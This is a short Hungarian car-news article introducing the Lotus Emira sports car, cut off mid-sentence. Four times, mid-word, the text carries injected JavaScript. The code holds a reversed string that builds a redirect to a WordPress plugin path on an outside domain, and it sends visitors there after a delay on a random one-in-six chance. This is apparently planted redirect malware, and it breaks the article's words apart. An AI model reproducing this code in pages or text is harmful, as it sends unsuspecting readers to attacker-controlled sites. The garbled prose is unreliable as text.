Amikor már azt hittük, nem készül több benzinmotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toros Lotus, színre lépett az Emira, amelyet nem csak az eddigi legösszeszedettebb típusának nevez a gyár, hanem – bár ez szubjektív – a legharmonikusabb megjelenést is kapta. Az Emira egy új generációs sportautó-platformra épül, amelynek szélesebb nyomtávja és mély tömegközéppontja stabilabbá teszi a kompakt (4412 x 1895 x 1225 mm) autót. Ha padlójában nem is, számos részletében a tisztán elektromos Evijától tanult: ilyenek például az első gépházfedelet oldalt megszakító légbeömlők, a hátfalon kialakítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott levegőkivezető nyílások, meg tulajdonképpen a teljes formanyelv. Mindennél persze sokkal fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb, hogy végre vadonatúj motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort vezet be a Lotus: az Emirához elsőként…
- Hirdetés -